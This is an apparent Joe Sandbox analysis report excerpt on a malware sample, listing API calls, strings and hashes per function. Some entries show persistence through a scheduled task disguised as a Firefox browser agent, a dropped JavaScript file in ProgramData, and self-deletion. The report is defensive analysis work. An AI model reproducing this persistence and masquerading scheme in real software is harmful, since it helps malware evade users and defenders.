                              • Opcode ID: 4143697b484c53d15f0f8cb9595e690e80b4335109ec839bbaf696a07b6bb917
                              • Instruction ID: d78338bea4f5dfd40393a5c24a1fb7f5fae0033344eb71368044f52ddd264ef5
                              • Opcode Fuzzy Hash: 4143697b484c53d15f0f8cb9595e690e80b4335109ec839bbaf696a07b6bb917
                              • Instruction Fuzzy Hash: 99311A71D0464DDBDB04CFE8C9447EEBBB0FB46319F10821AD8217B280DB799A48DB95
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc$zjhviby
                              • API String ID: 1384045349-3793283277
                              • Opcode ID: 725e1a558d91febb7fdf6d082b281f227d23e210de228e2814445b23873e99a8
                              • Instruction ID: 0d4b4138446d4409cb830ac8b81b4fc5f0107f2f619442bdc4b3768238f29321
                              • Opcode Fuzzy Hash: 725e1a558d91febb7fdf6d082b281f227d23e210de228e2814445b23873e99a8
                              • Instruction Fuzzy Hash: 59315971D0465CCECB11DFA4C851BAEBBB0FF16341F10825AE8257B281DB705A89DB50
                              APIs
                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,001511AD,?,5D76C35C,?,0015B469,?,001593E8,00000000,001511AD), ref: 0015B41B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 3664257935-537541572
                              • Opcode ID: b2c66c7681a4c5eda5fb992b71999dde9bc4bb70c6f7190815833436e4a11f78
                              • Instruction ID: 435f2144588abd627810f0114658788a93dc6aaa1cc817a2f59b09b71e57f5d5
                              • Opcode Fuzzy Hash: b2c66c7681a4c5eda5fb992b71999dde9bc4bb70c6f7190815833436e4a11f78
                              • Instruction Fuzzy Hash: E721C372A09210EBC7319F659CC5A6E7768EB417A2B250120FD32BB291D770EE09C6E0
                              APIs
                              Strings
                              • cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza, xrefs: 00152AF7
                              • avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc, xrefs: 00152AD2
                              • tfxgtsblbgudmdxba, xrefs: 00152AE6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc$cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza$tfxgtsblbgudmdxba
                              • API String ID: 1384045349-1665046790
                              • Opcode ID: dbd8d883772c3df280538b35dcc34e26db90aa6449ead28be99ee2bcf7e6eb5d
                              • Instruction ID: bffdf474858c878164cb653beed400ddbf58e612ac027f8d1607bdfa875e9da0
                              • Opcode Fuzzy Hash: dbd8d883772c3df280538b35dcc34e26db90aa6449ead28be99ee2bcf7e6eb5d
                              • Instruction Fuzzy Hash: FE21653090435CDBCB04DFA4CC55BEDBBB0FB15708F10062AE8266F281DB745A48CB50
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 01098166
                              • lstrcmpA.KERNEL32(00000000,INIT), ref: 01098173
                              • StrToIntA.SHLWAPI(00000000), ref: 01098236
                              • GetTickCount64.KERNEL32 ref: 0109863B
                                • Part of subcall function 01095740: GetProcessHeap.KERNEL32(00000008,00000001,010981FE,00000001,00000000), ref: 01095743
                                • Part of subcall function 01095740: HeapAlloc.KERNEL32(00000000), ref: 0109574A
                              • StrToIntA.SHLWAPI(00000000), ref: 01098534
                              • StrToIntA.SHLWAPI(?), ref: 0109853D
                              • CreateThread.KERNEL32(00000000,00000000,Function_00007550,00000000,00000000,00000000), ref: 01098551
                              • CloseHandle.KERNEL32(00000000), ref: 0109855C
                                • Part of subcall function 01095760: GetProcessHeap.KERNEL32(00000000,00000000,01098685), ref: 01095767
                                • Part of subcall function 01095760: HeapFree.KERNEL32(00000000), ref: 0109576E
                              • Sleep.KERNEL32(00000000), ref: 01098696
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
                              • String ID:
                              • API String ID: 1253608127-0
                              • Opcode ID: a431b14a7c9d3b9cad4ee7cd246c99cb4c5c9fc5cc250590508b1f79ecaf3e1f
                              • Instruction ID: 4439ec6e769ee0e78558182c94c333d63904510408866c7bd9f7805fc0993b83
                              • Opcode Fuzzy Hash: a431b14a7c9d3b9cad4ee7cd246c99cb4c5c9fc5cc250590508b1f79ecaf3e1f
                              • Instruction Fuzzy Hash: FA21D671E0030AD7DF25ABB5DC70AAFB6B9BF44740F00441BE581AB384DF3999049791
                              APIs
                              • GetLastError.KERNEL32(?,?,00155CEB,001558E2,00155066), ref: 00155D02
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00155D10
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00155D29
                              • SetLastError.KERNEL32(00000000,00155CEB,001558E2,00155066), ref: 00155D7B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: 811541d6e49a746364bbd6a0b33d5659d817804edee895cd914b6647b2fe90a2
                              • Instruction ID: af8a240a404a902544b6debeb0aab214d2f5af01fa0e27525d78ac9a1d1df769
                              • Opcode Fuzzy Hash: 811541d6e49a746364bbd6a0b33d5659d817804edee895cd914b6647b2fe90a2
                              • Instruction Fuzzy Hash: D101923351DA25DAA72426F47CD966B2B66EB21777730022AF9308E4F1FB9148889154
                              APIs
                              Strings
                              • ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy, xrefs: 00152D32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: ifzhjtykldxivkkvpudrnyrhjbvqsnofbmfktkcithkjgeaacrzxhwzalussflvvedy
                              • API String ID: 1384045349-2373637132
                              • Opcode ID: 825b274acca1970eb3cc1d4cb515229b66f4f5165c8bddd6b743105027427065
                              • Instruction ID: 891e4c7ffee13020be65ae7435034890019d83d5026ba86fa223796ce173c9e6
                              • Opcode Fuzzy Hash: 825b274acca1970eb3cc1d4cb515229b66f4f5165c8bddd6b743105027427065
                              • Instruction Fuzzy Hash: 12216D30C0468CDEDB05DFA4C8547DEBBB4EF2A314F00825AE8217B2C1DBB55648CB95
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: -$8$=
                              • API String ID: 0-1406877022
                              • Opcode ID: 13fafae1a219e880aaba5b9c4e80245e567fffd22efa5ec1bce551fc45b69d21
                              • Instruction ID: 61e43586e9c980684f9eefecba5e6714f291d005fbd68453173371ee2280bc48
                              • Opcode Fuzzy Hash: 13fafae1a219e880aaba5b9c4e80245e567fffd22efa5ec1bce551fc45b69d21
                              • Instruction Fuzzy Hash: 84111672C0060DCACB09CFA8D8463BEB770FB56306F10825AD8227A640DB749A88DF81
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5D76C35C,?,?,00000000,00162094,000000FF,?,001583C5,?,?,00158399,00000016), ref: 0015841E
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00158430
                              • FreeLibrary.KERNEL32(00000000,?,00000000,00162094,000000FF,?,001583C5,?,?,00158399,00000016), ref: 00158452
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 7c502123ee8cd3d5f7af86cedf69ba70e1eaa548fdc5a6d41e045f88c17a15f6
                              • Instruction ID: db83c962b08b991272e77b167b00054731de2e188ef7475675a58eecbc50b643
                              • Opcode Fuzzy Hash: 7c502123ee8cd3d5f7af86cedf69ba70e1eaa548fdc5a6d41e045f88c17a15f6
                              • Instruction Fuzzy Hash: FB018631A44659EFDB129F54CC09BAEBBB8FB04B11F004625FC31A26E0DBB59A44CA90
                              APIs
                              • wnsprintfW.SHLWAPI ref: 010974FF
                              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 0109751B
                                • Part of subcall function 01096C40: VariantInit.OLEAUT32(?), ref: 01096C57
                                • Part of subcall function 01096C40: CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096C74
                                • Part of subcall function 01096C40: SysAllocString.OLEAUT32(\Mozilla), ref: 01096CB4
                                • Part of subcall function 01096C40: SysFreeString.OLEAUT32(?), ref: 01096CEB
                                • Part of subcall function 01096C40: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096CF8
                                • Part of subcall function 01096C40: SysFreeString.OLEAUT32(00000000), ref: 01096D0F
                                • Part of subcall function 010995F0: GetFileAttributesW.KERNEL32(?,01097531), ref: 010995F1
                              • DeleteFileW.KERNEL32(?), ref: 0109753C
                              • ExitProcess.KERNEL32 ref: 01097544
                              Strings
                              • %%ProgramData%%\r%Sr.js, xrefs: 010974F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
                              • String ID: %%ProgramData%%\r%Sr.js
                              • API String ID: 3376550436-2368859843
                              • Opcode ID: 3f99b48a627c193502f90cc403b67339fe5805cb8a3719b2f64cee4f556c7c65
                              • Instruction ID: d2233ea8802c4b7a13b1dfcdb6633481e39c0e15fce92c0fa5ff3e77cdc8dfca
                              • Opcode Fuzzy Hash: 3f99b48a627c193502f90cc403b67339fe5805cb8a3719b2f64cee4f556c7c65
                              • Instruction Fuzzy Hash: 6FF082B194030CA7CF20E7A0DC6DED9333CBB04714F4005A4B7D596091DAB556C58B10
                              APIs
                              • __alloca_probe_16.LIBCMT ref: 0015CB35
                              • __alloca_probe_16.LIBCMT ref: 0015CBFE
                              • __freea.LIBCMT ref: 0015CC65
                                • Part of subcall function 001593A5: HeapAlloc.KERNEL32(00000000,001511AD,?,?,001511AD,?), ref: 001593D7
                              • __freea.LIBCMT ref: 0015CC78
                              • __freea.LIBCMT ref: 0015CC85
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __freea$__alloca_probe_16$AllocHeap
                              • String ID:
                              • API String ID: 1096550386-0
                              • Opcode ID: 14115dd44f8acf793bc7925a737899f446335ea5728e930adee2e208eca2db94
                              • Instruction ID: 01b6b35f2fe1d7104701337d3e8ffb69d84d2822a6d4ce7c6636a4a8700e5daf
                              • Opcode Fuzzy Hash: 14115dd44f8acf793bc7925a737899f446335ea5728e930adee2e208eca2db94
                              • Instruction Fuzzy Hash: 5F51C17260030AEFEB219F648C85EBB7AA9EF54716B150129FD29DF150EB31DC58C6A0
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00156DC3,00000000,?,0016BD48,?,?,?,00156F66,00000004,InitializeCriticalSectionEx,00163C98,InitializeCriticalSectionEx), ref: 00156E1F
                              • GetLastError.KERNEL32(?,00156DC3,00000000,?,0016BD48,?,?,?,00156F66,00000004,InitializeCriticalSectionEx,00163C98,InitializeCriticalSectionEx,00000000,?,00156D1D), ref: 00156E29
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00156E51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LibraryLoad$ErrorLast
                              • String ID: api-ms-
                              • API String ID: 3177248105-2084034818
                              • Opcode ID: 32c06511650c7ed508b47ebac72f0b0e3ebff85c45cf7afd8e8d2b033624057b
                              • Instruction ID: 155e843c16300e39aff2551631d5d69a344afac8fcf96952214e3519c977a442
                              • Opcode Fuzzy Hash: 32c06511650c7ed508b47ebac72f0b0e3ebff85c45cf7afd8e8d2b033624057b
                              • Instruction Fuzzy Hash: 24E01A74680308F6EF205FA0EC07B5D3B599B20B42F504020FE2DA84E1EBA2DA5999C5
                              APIs
                              • GetConsoleOutputCP.KERNEL32(5D76C35C,00000000,00000000,00000008), ref: 0015CFE0
                                • Part of subcall function 0015A5D9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0015CC5B,?,00000000,-00000008), ref: 0015A63A
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0015D232
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0015D278
                              • GetLastError.KERNEL32 ref: 0015D31B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                              • String ID:
                              • API String ID: 2112829910-0
                              • Opcode ID: 27ac723c6228480edb496d412edda99d1ba99f322461b9efdbf6869ac27d01d9
                              • Instruction ID: 95347240783fe5056a28e0b7c95deca6bf329335a665d9a057f618fc0c1dfb31
                              • Opcode Fuzzy Hash: 27ac723c6228480edb496d412edda99d1ba99f322461b9efdbf6869ac27d01d9
                              • Instruction Fuzzy Hash: 0BD16BB5D04249DFCB25CFE8D8809ADBBB5FF09311F24416AE866EB351D730A94ACB50
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: b93d03de3ef76e55000176113604154042a64010b7c4a043f906220a6f2ac0ed
                              • Instruction ID: 9e1fd1bae2e740226eb663348c04d72bba1700328f383ffdcdbc569d7e77a3bb
                              • Opcode Fuzzy Hash: b93d03de3ef76e55000176113604154042a64010b7c4a043f906220a6f2ac0ed
                              • Instruction Fuzzy Hash: 2E51D672604B02EFDB298F54D862B6AF7A6EF10712F14412EEC225F5A1D731ED48C790
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000), ref: 0015E76D
                              • GetLastError.KERNEL32(?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008,00000008,?,0015D912,00000000), ref: 0015E779
                                • Part of subcall function 0015E73F: CloseHandle.KERNEL32(FFFFFFFE,0015E789,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008,00000008), ref: 0015E74F
                              • ___initconout.LIBCMT ref: 0015E789
                                • Part of subcall function 0015E701: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0015E730,0015DEFD,00000008,?,0015D36F,00000008,00000000,00000000,00000008), ref: 0015E714
                              • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0015DF10,00000000,00000001,?,00000008,?,0015D36F,00000008,00000000,00000000,00000008), ref: 0015E79E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: eb53636e7bddd570930fa788e8ac825484aff477aef5bc8941e0f23e8da5b814
                              • Instruction ID: e6de725498b617309e3a7b8fcd382ac45da448d89a3b5a943dc460330a3e58c9
                              • Opcode Fuzzy Hash: eb53636e7bddd570930fa788e8ac825484aff477aef5bc8941e0f23e8da5b814
                              • Instruction Fuzzy Hash: 81F0A236515159FBCF262FD5DC4599A3F66FB083A1B144010FD2996520C772CA64DBD0
                              APIs
                              • EncodePointer.KERNEL32(00000000,?), ref: 001563F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: EncodePointer
                              • String ID: MOC$RCC
                              • API String ID: 2118026453-2084237596
                              • Opcode ID: 26181f7bcad69524043e8398a5b557f7d564858cff103c2bb166e01af319d70c
                              • Instruction ID: d9842c8e21103862d8620fc7b2e66b6a55384f409323301d51178b0d918380b1
                              • Opcode Fuzzy Hash: 26181f7bcad69524043e8398a5b557f7d564858cff103c2bb166e01af319d70c
                              • Instruction Fuzzy Hash: FC418971900209EFCF16CF98CD81AEEBBB5BF18305F548059FD24AB221D7359994DB91
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32), ref: 0015111B
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00151162
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID: kernel32
                              • API String ID: 4139908857-541877477
                              • Opcode ID: 6fef3f1a636cb2a89174846f66797be25057e78642904a8f61af783634853e38
                              • Instruction ID: 6568fda02a663ac8b0021737013e9361a3ed5b047a6cfbb66965a1c0b5931def
                              • Opcode Fuzzy Hash: 6fef3f1a636cb2a89174846f66797be25057e78642904a8f61af783634853e38
                              • Instruction Fuzzy Hash: B021A4B9D00208EBCB04EFE4DD85AEEBBB4AF48305F108559E915AB240E7759A45CBA1